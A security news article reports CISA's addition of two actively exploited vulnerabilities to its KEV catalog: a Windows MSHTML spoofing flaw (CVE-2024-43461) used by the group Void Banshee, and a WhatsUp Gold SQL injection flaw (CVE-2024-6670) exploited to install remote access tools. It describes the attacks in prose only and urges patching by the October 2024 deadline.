CISA Flags Two Actively Exploited Vulnerabilities: Critical Threats to Windows and WhatsUp Gold

Exploited Windows Security Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning, adding two actively exploited security flaws to its Known Exploited Vulnerabilities (KEV) catalog, urging immediate action from federal agencies and organizations worldwide.

CVE-2024-43461: Microsoft Windows MSHTML Platform Spoofing Vulnerability (CVSS 8.8)

Microsoft’s MSHTML platform is under siege as a critical user interface (UI) misrepresentation flaw has come to light. Identified as CVE-2024-43461, this vulnerability enables attackers to spoof web pages, tricking users into downloading or executing malicious files. Exploiting this flaw requires user interaction, typically by visiting a malicious website or opening a specially crafted file. The flaw’s danger lies in how it disguises file extensions, misleading users into believing a malicious file is harmless.

According to a security advisory by the Zero Day Initiative (ZDI), the vulnerability arises from the way Internet Explorer prompts users after downloading a file. Attackers can exploit this misrepresentation to execute malicious code in the context of the current user. The threat is exacerbated by the fact that the vulnerability was exploited in tandem with CVE-2024-38112, a zero-day vulnerability with a CVSS score of 7.5.

In July 2024, Trend Micro researchers linked CVE-2024-38112 to an advanced persistent threat (APT) group dubbed “Void Banshee.” This group exploited the Windows zero-day to deploy the Atlantida info-stealer malware, which siphons sensitive data such as passwords and browser cookies from compromised systems. The flaw was first observed being exploited in May 2024, with Void Banshee utilizing it to target systems where Internet Explorer was disabled, further complicating detection and defense.

CVE-2024-6670: Progress WhatsUp Gold SQL Injection Vulnerability (CVSS 9.8)

Progress WhatsUp Gold, a popular network monitoring tool, has been compromised through a severe SQL injection vulnerability—tracked as CVE-2024-6670. This flaw, rated at a critical CVSS score of 9.8, allows unauthenticated attackers to retrieve encrypted user passwords if the application is configured with a single user. Even more troubling, this vulnerability has been leveraged in a series of remote code execution (RCE) attacks.

Trend Micro researchers discovered that attackers are exploiting the SQL injection vulnerability through the Active Monitor PowerShell Script function, using NmPoller.exe, a legitimate WhatsUp Gold process, to execute malicious PowerShell scripts. By doing so, attackers can download and deploy various remote access tools (RATs), such as Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, establishing persistence on the victim’s system.

Attackers used msiexec.exe, a trusted Windows installer process, to stealthily install the RATs from malicious URLs, thereby bypassing traditional detection mechanisms. Once inside the network, the threat actors could operate undetected, maintaining control over compromised environments while continuously exfiltrating data or deploying additional payloads.

Federal Agencies Mandated to Act

In response to the active exploitation of these two vulnerabilities, CISA has mandated that federal agencies apply the necessary patches and mitigations by October 7, 2024. Microsoft and Progress have both released patches addressing these flaws, and administrators are urged to update affected systems immediately to prevent further exploitation.

Related Posts: